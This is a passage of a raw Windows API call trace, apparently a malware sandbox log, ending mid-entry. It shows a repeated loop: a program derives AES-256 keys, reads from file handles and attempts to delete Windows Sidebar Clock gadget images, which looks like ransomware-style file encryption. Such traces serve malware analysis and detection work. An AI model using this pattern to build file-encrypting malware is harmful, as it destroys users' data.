[0187.459] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.476] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.476] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.476] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.478] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_dot.png")) returned 0 [0187.479] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.480] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.480] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.480] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.480] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb6a [0187.480] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.510] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.510] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.510] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.511] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_h.png")) returned 0 [0187.512] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.513] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.513] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.513] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.513] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7c [0187.513] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.531] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.531] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.531] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.533] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_m.png")) returned 0 [0187.535] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.536] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.536] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.536] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.536] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbde [0187.536] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.539] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.539] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.539] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.540] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_s.png")) returned 0 [0187.541] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.541] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.541] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.541] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.541] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51d1 [0187.541] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.546] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.546] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.546] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.548] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_settings.png")) returned 0 [0187.572] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.573] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.573] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.573] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.573] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6408 [0187.573] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.603] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.604] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.604] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.605] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty.png")) returned 0 [0187.606] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.606] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.606] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.606] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.606] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb57 [0187.606] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.609] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.609] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.609] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.611] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_dot.png")) returned 0 [0187.612] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.612] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.612] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.612] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.612] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb8f [0187.612] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.616] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.616] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.616] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.618] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_h.png")) returned 0 [0187.619] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.619] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.619] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.619] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.619] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xba3 [0187.619] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.622] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.622] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.622] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.624] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_m.png")) returned 0 [0187.625] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.626] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.626] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.626] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.626] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb67 [0187.626] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.629] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.629] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.629] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.630] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_s.png")) returned 0 [0187.631] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.632] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.632] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.632] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.632] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x702e [0187.632] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.636] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.636] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.636] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.638] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_settings.png")) returned 0 [0187.639] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.640] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.640] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.640] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.640] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c [0187.640] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.642] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.642] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.642] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.643] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_bottom.png")) returned 0 [0187.645] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.646] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.646] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.646] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.646] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x87 [0187.646] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.648] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.648] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.648] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.649] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_left.png")) returned 0 [0187.650] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.651] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.651] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.651] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.651] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x87 [0187.651] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.653] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.653] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.653] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.654] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_right.png")) returned 0 [0187.655] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.656] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.656] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.656] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.656] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x89 [0187.656] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.657] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.657] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.657] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.659] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_left.png")) returned 0 [0187.682] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.682] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.683] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.683] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.683] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x89 [0187.683] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.685] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.685] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.685] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.686] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_right.png")) returned 0 [0187.687] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.688] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.688] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.688] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.688] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x89 [0187.688] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.689] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.690] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.690] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.691] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_top.png")) returned 0 [0187.692] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.692] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.692] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.692] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.692] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa8 [0187.693] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.694] CryptDestroyHash (hHash=0x284d528) returned 1 [0187.694] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.694] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.695] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_left.png")) returned 0 [0187.696] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.697] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0187.697] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.697] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0187.697] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa5 [0187.697] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0187.699] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0187.699] CryptDestroyKey (hKey=0x284d568) returned 1 [0187.699] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0187.700] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_right.png")) returned 0 [0187.701] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0187.702] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | 